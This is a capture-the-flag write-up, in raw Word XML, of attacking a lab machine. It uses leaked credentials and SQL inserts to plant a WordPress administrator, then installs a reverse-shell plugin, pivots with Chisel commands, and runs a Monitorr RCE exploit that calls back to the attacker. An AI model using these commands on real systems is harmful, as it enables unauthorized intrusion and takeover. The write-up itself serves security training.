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POTOUB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oc7arbz1s1ig"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first step, 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08200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">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3306 - MYSQL</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taking a look at the web application running on port 80, but first we need to map the IP address to the domain name by adding a line to the hosts file, as illustrated in the image.</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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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16383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2819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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this is a very static application, we can perform fuzzing on files and directories to find something relevant. I will use the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tool with combinations of wordlists from SecLists.</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68500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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found two interesting files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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analyzing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can notice a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">security misconfiguration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it copies everything from the current directory to the web application’s document root.</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35300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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Analyzing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we obtain the database access credentials. Knowing that this is a WordPress (CMS), we can perform subdomain enumeration to locate it.</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27200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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add the newly discovered subdomain to our hosts file.</w:t>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16100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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84500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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have the database credentials </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yml</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we can access the database in order to retrieve the WordPress login credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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81"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attempting to crack the hash of the admin user without success, we can create a new user and assign it the administrator role:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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INSERT INTO `wordpressdb`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,</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`user_registered`, `user_activation_key`, `user_status`, `display_name`)</w:t>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VALUES ('2', 'new_user', MD5('123456'), 'Your Name', 'new_user@example.com',</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'http://www.example.com/', '2022-09-01 00:00:00', '', '0', 'new_user');</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INSERT INTO `wordpressdb`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`)</w:t>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VALUES (NULL, '2', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');</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97000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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24000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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creating the new user and assigning the administrator role (based on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user_id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which in our case is 2), we can access the WordPress administrative panel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://blog.potoub.hackingclub/wp-admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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63800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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94000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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have administrator privileges, we can create a malicious plugin containing a reverse shell payload, allowing us to gain access to the server.</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hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell</w:t>
        </w:r>
      </w:hyperlink>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14500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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47800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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now install our malicious plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2374900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="92"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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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35200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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selecting our malicious plugin and clicking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Now</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will be redirected to the installation page.</w:t>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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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clicking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate Plugin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will receive the reverse connection shortly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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85900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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jp6ft51y6ctk" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</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97000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90"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performing enumeration on the server, we did not initially find anything useful for privilege escalation. However, since this is a Docker environment, we can scan its internal network to discover additional hosts.</w:t>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For this, we need a static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 binary, since nmap is not installed inside the container:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap</w:t>
        </w:r>
      </w:hyperlink>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also need the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, which contains the list of ports and their corresponding services. This file is located at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/nmap/nmap-services </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(If you are on another system with nmap installed, you can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">locate nmap-services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find it.)</w:t>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81100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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necessary files on the server, we can start scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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93900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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17600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="88"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identify a web service running on port 80 of host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.21.0.6</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We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to perform pivoting, forwarding port 80 from that host to our local machine, allowing us to access the application through our browser.</w:t>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hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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73200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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97000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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tool on the server, we perform the technique.</w:t>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our local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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./chisel server -p 9000 --reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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the target:</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./chisel client &lt;IP-VPN&gt;:9000 R:5000:172.21.0.6:80</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60500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84" name="image41.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>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completing this process, we can access the application in our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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98800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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both"/>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Monitorr is a web frontend for displaying the live status of any web application or service. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking at the footer, we identify version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7.6m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Searching for exploits for this version, we find:</w:t>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Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/48980</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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download it.</w:t>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95400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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reverse connection.</w:t>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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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execute it with the following parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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xpl.py http://127.0.0.1:5000 &lt;IP-VPN&gt; 4445</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>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execution, we receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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47800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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root directory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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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89200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>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Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm /4000 2&gt;/dev/null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to locate SUID binaries, we identify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cpulimit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binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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55700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
